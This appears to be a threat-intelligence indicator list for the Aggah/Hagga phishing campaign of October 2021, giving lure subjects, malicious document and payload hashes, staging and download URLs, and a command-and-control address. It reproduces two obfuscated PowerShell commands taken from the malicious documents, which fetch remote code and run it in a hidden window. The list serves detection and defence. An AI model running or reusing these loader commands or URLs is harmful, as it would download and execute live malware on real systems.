2021-10-18 Aggah IOCs
THREAT ATTRIBUTION: AGGAH / HAGGA
SUBJECTS OBSERVED
Shipping Documents and Delivery Notice
Urgent Requirement ( RFQ NO: 1311719753)
RFP : 1311719753
SENDERS OBSERVED
MALDOC FILE HASHES (MD5)
1311719753.ppt  3e804f9f266483ec4884546f08e396a8
Purchase orders with bank details.ppa  87b2f6337fbea5ee3f10eb1b210dd795
Shipment Documents.ppt  3e804f9f266483ec4884546f08e396a8
POWERSHELL FROM MALDOCS
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d4a8cf357544827a7943b96f91f5785.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_15c2594b40a245a9936b81883534b8d8.txt').GetResponse().GetResponseStream()).ReadToend());
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/choasknight/xXEKBr/ab183323ae3edc2de176d3cb703bf39982f72eb7/files/qwer1') -useB);
AGGAH PAYLOAD STAGING URLS
http://bitly.com/jfklsdjfsgyfsdhgfjksdh
http://bitly.com/ajdwwrufqwehjwijjd
https://meinajkallunjaisahowawahun.blogspot.com/p/qwerty11111qq.html
https://www.blogger.com/blogin.g?blogspotURL=https://meinajkallunjaisahowawahun.blogspot.com/p/qwerty11111qq.html&type=blog
AGGAH PAYLOAD DOWNLOAD URLS
https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_6d4a8cf357544827a7943b96f91f5785.txt
https://bitbucket.org/!api/2.0/snippets/choasknight/xXEKBr/ab183323ae3edc2de176d3cb703bf39982f72eb7/files/qwer1
AGGAH PAYLOAD FILE HASHES (MD5)
aggah1.exe  52353050649e9c0b212be44d26e8b4dd
aggah2.exe  a943bea8997dec969ba9cff3286ef6e2
AGGAH C2
http://103.125.190.248/j/p11l/mawa/0b5eace2c983ebeba55b.php
SUPPORTING EVIDENCE
https://www.virustotal.com/gui/file/8811a7bfc8b36649308ae32e37c3cfcd0e1bf700f34988bb9c7028a7d367d894
https://www.virustotal.com/gui/file/93002698d17ed42fda59a7a37533c12bd13ce27fae60d6673c7b71f94a0eccc7